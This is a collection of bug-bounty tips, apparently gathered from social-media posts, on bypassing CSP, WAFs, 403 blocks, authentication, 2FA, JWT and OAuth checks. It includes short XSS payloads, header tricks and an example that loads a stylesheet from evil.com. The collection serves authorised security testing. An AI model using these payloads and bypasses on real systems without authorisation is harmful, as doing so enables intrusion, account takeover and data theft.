Bypasses

• It's possible to bypass #CSP with the following : #JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

• Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips

• If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.

• Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.

• Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip

• Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty

• When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.

• CSP Bypass, script-src 'self' data: - https://twitter.com/404death/status/1191222237782659072

• Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.

• I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.

• OTP bypass - https://twitter.com/HackerHumble

• sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)

• Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ #bugbountytip

Cloudfront Bypass -

403 Bypass:

https://twitter.com/RathiArpeet/status/1315593774773334016

https://twitter.com/hackerscrolls/status/1254701239360720900

Tool -

• https://github.com/lobuhi/byp4xx

• https://github.com/Raywando/4xxbypass

• https://github.com/sting8k/BurpSuite_403Bypasser

• if “origin” header not work, try with “x-[org name]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc

• #bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...

• Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.

  What worked was... \udfff -> � -> ?

  Therefore... {"redirectUri":"https://attacker\udfff@[victim]/"}

  Equals... Location: https://attacker?@[victim]/

• JWT Token Bypasses #2:

  1. Capture the JWT token.

  2. If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)

• Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bugbountytip

• Price Manipulation -

https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20

{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK

POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}

GET /api_v1/messages?user_id=VICTIM_ID --> 401

GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK

• How to find authentication bypass vulnerabilities. Focus. I Added headers.

  Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized

  Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found

• CSP - So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "<svg><link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec

https://twitter.com/iam_j0ker/status/1303658167205728256?s=20

• CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).

  But I can raise it again to P3 (Iframe Injection) and Triaged.

  <iframe src= blocked by CSP

  Solution:

  <iframe srcdoc=

• Auth bypass tip:

  /api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true

  Found:

  /api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:[ + ] PII Info disclosure [ + ] Sensitive info leak [ + ] Access admin endpoint #bugbantytips #bugbountytips

• 1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips